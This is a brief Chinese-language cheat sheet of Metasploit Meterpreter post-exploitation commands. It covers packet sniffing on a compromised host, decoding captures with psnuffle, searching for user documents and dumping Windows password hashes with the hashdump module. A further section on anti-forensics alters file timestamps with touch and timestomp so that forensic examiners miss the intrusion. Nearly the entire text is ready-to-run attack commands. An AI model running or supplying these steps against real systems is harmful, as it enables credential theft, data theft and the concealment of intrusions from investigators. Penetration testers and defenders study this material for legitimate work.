抓包
- load sniffer
- sniffer_interfaces
- sniffer_start 2
- sniffer_dump 2 1.cap /
- 在内存中缓存区块循环存储抓包,不写硬盘
- 智能过滤meterpreter流量,传输全程使用SSL/TLS加密
解码
- use auxiliary/sniffer/psnuffle
- set PCAPFILE 1.cap
搜索
- search -f *.ini
- search -d c\\documents\ and\ settings\\administrator\desktop\ -f *.docx
破解弱口令密码
meterpreter->hashdump即可获得用户名密码,但是用下面的模块
use post/windows/gather/hashdump #system权限的meterpreter,如果是弱密码,则会直接显示密码明文
痕迹消除
文件系统访问会留下痕迹,电子取证重点关注
渗透测试和攻击者往往希望销毁文件系统访问痕迹
最好的避免被电子取证发现的方法:不要碰文件系统
- meterpreter的先天优势:完全基于内存
MAC时间(Modified/Accessed/Changed)
- ls -l –time=xxxx
- stat 1.txt
- touch -d “2 days ago” 1.txt
- touch -t 1501010101 1.txt
timestomp
- timestomp 1.txt -t template.txt
MACE:MFT entry
- MFT:NTFS文件系统的主文件分配表 Master File Table
- 通常1024字节或2个硬盘扇区,其中存放多项entry信息
- 包含文件大量信息(大小、名称、目录位置、磁盘位置、创建日期)
- 更多信息可研究 文件系统取证分析技术